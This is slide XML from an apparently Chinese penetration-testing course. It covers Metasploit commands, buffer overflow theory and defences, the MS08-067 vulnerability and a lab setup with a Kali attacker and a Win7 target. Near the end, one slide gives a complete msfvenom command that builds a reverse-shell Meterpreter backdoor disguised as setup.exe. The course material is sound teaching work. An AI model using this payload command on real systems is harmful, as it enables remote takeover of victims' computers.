            <a:off x="3276599" y="2438717"/>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81" name="AutoShape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9001125" y="257175"/>
            <a:ext cx="2905125" cy="42862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项目目标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285967" y="2196201"/>
            <a:ext cx="9167774" cy="394849"/>
            <a:chOff x="3926561" y="2953576"/>
            <a:chExt cx="7759700" cy="394849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="86" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4118976" y="2968181"/>
              <a:ext cx="2885680"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了解网络渗透攻击的步骤。</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7115913" y="2953576"/>
              <a:ext cx="3265246"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熟悉网络渗透中的漏洞扫描。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="90" name="直接连接符 89"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3926561" y="334842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396504" y="1587028"/>
            <a:ext cx="1534885" cy="458459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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396676" y="2686251"/>
            <a:ext cx="1534885" cy="458459"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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286015" y="3276691"/>
            <a:ext cx="9167774" cy="966349"/>
            <a:chOff x="3891089" y="2705926"/>
            <a:chExt cx="7759700" cy="966349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4083503" y="2705926"/>
              <a:ext cx="617822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一次网络渗透攻击MS08-067，完成对win7的渗透测试。</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5" name="i$ḻîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4083503" y="3182176"/>
              <a:ext cx="4136374"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能对Oracle数据库溢出漏洞案例进行渗透攻击。</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91089" y="367227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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="97"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6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2513297" y="4800336"/>
            <a:ext cx="6433185" cy="809625"/>
            <a:chOff x="4065766" y="2953576"/>
            <a:chExt cx="5445116" cy="809625"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="98" name="ïṡļîḍe"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4065766" y="2953576"/>
              <a:ext cx="5445116"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具备预防缓冲区溢出攻击的能力，具备良好的职业道德。</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9" name="ïSľíḍé"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4065766" y="3426016"/>
              <a:ext cx="5072649"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通过学习网络安全法律法规，具备良好的职业道德和工匠精神。</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent1">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="60000">
                      <a:schemeClr val="accent1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="2700000" scaled="0"/>
                </a:gradFill>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2402854" y="4229263"/>
            <a:ext cx="1534885" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>素质目标</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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160145" y="1447800"/>
            <a:ext cx="10546715" cy="435292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还有其他的很多命令，可以输入”？”进行查看，这里只对命令进行简单的使用介绍，并不代表只有这些命令，命令分为内核命令、模块命令、数据库后端命令等等，如图5-20所示。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3" name="图片 20"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="3048000"/>
            <a:ext cx="6395720" cy="3136265"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="6324600"/>
            <a:ext cx="3742690" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-20 查看可以使用的其它命令</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371627" y="797972"/>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模块命令基本使用</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143000" y="1447800"/>
            <a:ext cx="10546715" cy="563880"/>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(2)Msfconsol使用</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6351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7058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24000" y="4171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410200" y="228600"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>表5-1 Metasploit常用基本命令</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3962400" y="685800"/>
            <a:ext cx="6450330" cy="624713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4302" cy="843748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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缓冲区溢出的</a:t>
            </a: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概念</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547" y="1994199"/>
            <a:ext cx="6414302" cy="1261086"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825"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缓冲区溢出是程序设计中常见漏洞，</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它发生在程序固定分配的缓冲区大小与用户输入数据长度不一致时。</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因开发者未对用户输入长度验证，导致数据溢出覆盖关键数据，引发程序崩溃或系统瘫痪，是需警惕的安全问题。</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a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432633" y="1237527"/>
            <a:ext cx="3505032"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认识缓冲区溢出</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5" name="图片 21" descr="overflowDig"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-1315" b="1070"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="3886200"/>
            <a:ext cx="4813300" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本框 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="5486400"/>
            <a:ext cx="2875915" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-21 缓冲区溢出</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869562" y="1518100"/>
            <a:ext cx="6214706" cy="843748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>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缓冲区溢出的例子</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733425" y="2362200"/>
            <a:ext cx="6699250" cy="1261110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825"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首次大规模缓冲区溢出攻击是1988年Morris蠕虫，利用fingerd缓冲区溢出导致6000多台机器瘫痪，损失巨大；此类攻击占网络攻击绝大多数，约80%。</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a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7432633" y="1237527"/>
            <a:ext cx="3505032"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认识缓冲区溢出</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33" name="TextBox 33"/>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缓冲区溢出原理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4" name="文本框 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1371600"/>
            <a:ext cx="10029190" cy="101473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计算机运行时，系统将内存划分为3个段，分别是代码段、数据段和堆栈段。Windows 系统的内存结构，如图5-23所示。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5" name="图片 23" descr="0282"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7467600" y="2286000"/>
            <a:ext cx="2256155" cy="2613025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="文本框 35"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7010400" y="5105400"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-23 Windows 系统的内存结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="文本框 36"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2494915"/>
            <a:ext cx="6105525" cy="2187575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t>代码段：数据只读，可执行。在代码段一切数据不允许更改。在代码段中的数据是在编译时生成的2进制机器代码，可供CPU执行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t>数据段：静态全局变量是位于数据段并且在程序开始运行的时候被加载。可读、写 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:cs typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t>堆栈段：放置程序运行时动态的局部变量，即局部变量的空间被分配在堆栈里面。可读、写 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:cs typeface="华文新魏" panose="02010800040101010101"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33" name="TextBox 33"/>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缓冲区溢出原理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4" name="文本框 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1905000"/>
            <a:ext cx="10029190" cy="332295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缓冲区溢出的危害远超想象。黑客通过操纵EIP，可令程序执行恶意代码，即shellcode，夺取系统控制权。这不仅可导致程序崩溃或重启，更可执行未授权指令，获取系统特权，引发非法操作。特别是堆栈溢出，攻击者可改变程序返回地址，引发服务拒绝或执行恶意代码，如获取shell，造成严重后果。</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流行的缓冲区溢出病毒，如冲击波、震荡波等，通过利用RPC、LSASS、UPNP等漏洞，对计算机发起攻击，显示了缓冲区溢出的广泛威胁。</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1134745" y="1143000"/>
            <a:ext cx="6414135" cy="698500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="174000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr 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rPr>
              <a:t>缓冲区溢出的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" alt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rPr>
              <a:t>危害</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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33" name="TextBox 33"/>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缓冲区溢出原理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4" name="文本框 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="1905000"/>
            <a:ext cx="10029190" cy="239966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强制程序开发人员书写正确的、安全的代码。目前，可以借助grep、FaultInjection、PurifyPlus等工具帮助开发人员发现程序中的安全漏洞。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通过对数组的读写操作进行边界检查来实现缓冲区的保护，使得缓冲区溢出不可能出现，从而完全消除了缓冲区溢出的威胁。常见的对数组操作进行检查的工具有Compaq C编译器，Richard Jones和Paul Kelly开发的gcc补丁等。 </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TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1134745" y="1143000"/>
            <a:ext cx="6414135" cy="698500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="123825" tIns="123825" rIns="57150" bIns="123825" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="174000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" alt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rPr>
              <a:t>防范缓冲区溢出攻击的有效措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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l">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066800" y="1371600"/>
            <a:ext cx="10124440" cy="3344545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:no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MS08-067漏洞，即"Windows Server服务RPC请求缓冲区溢出漏洞"，是一个严重的安全威胁。攻击者可通过向受影响系统发送特制RPC请求，利用SMB服务端口445，破坏栈缓冲区，获取远程代码执行权限，完全控制主机。这一漏洞影响Windows 2000、XP和Server 2003系统，且可能无需身份验证即可被利用，是蠕虫攻击的温床。</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在理解渗透攻击的基础上，我们可通过MSF终端进行参数设置，实践真实的攻击过程，加深对攻击手段的认识。同时，遵循防火墙最佳实践和标准配置，有助于保护网络资源，抵御外部攻击。</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600200" y="1295400"/>
            <a:ext cx="6096000" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>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1</a:t>
            </a:r>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、分析MS08_067漏洞利用</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028700" y="1752600"/>
            <a:ext cx="4537710" cy="424624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本项目设计对某公司渗透测试目标实验环境网络拓扑结构如图所示。包括了DMZ区（非军事区）与公司内网，其中的DMZ区部署了公司的门户网站服务器、后台服务器，并且为渗透测试提供了初始攻击点-BT55系统平台攻击机，公司内网中包括安装Win7系统并有无线网络接入的终端主机，实验环境拓扑如图5-24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1" name="图片 24" descr="image (6)"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="1600200"/>
            <a:ext cx="5772785" cy="4209415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="文本框 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7924800" y="5867400"/>
            <a:ext cx="2812415" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-24 实验环境拓扑图</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="文本框 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3341370" y="6400800"/>
            <a:ext cx="8729980" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>准备工作：kali Linux系统（IP:10.10.10.128）、win7系统 （IP:10.10.10.132）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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600200" y="12954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90600" y="1694180"/>
            <a:ext cx="4678045" cy="147637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1）确认网络连通性</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打开上述的虚拟机电源，ping通虚拟机，如图5-25所示。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5" name="图片 25"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5943600" y="1346835"/>
            <a:ext cx="5309235" cy="4163695"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本框 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6934200" y="5715000"/>
            <a:ext cx="6096000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-25 确认网络连通性</a:t>
            </a:r>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90600" y="1600200"/>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2） 制作一个后门程序</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066800" y="2153285"/>
            <a:ext cx="10718165" cy="1337945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件名为：setup.exe，通过如下的命令：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              </a:rPr>
              <a:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=50000 -f exe -o setup.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> 监听本地地址及端口号：10.10.10.128：50000 ，结果如图5-26所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 26"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3276600" y="3429000"/>
            <a:ext cx="4813300" cy="3155950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="6553200"/>
            <a:ext cx="5419725" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>图5-26 在kali上制作一个后门程序setup.exe</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN"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90600" y="1600200"/>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2） 制作一个后门程序</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066800" y="2153285"/>
            <a:ext cx="10718165" cy="506730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
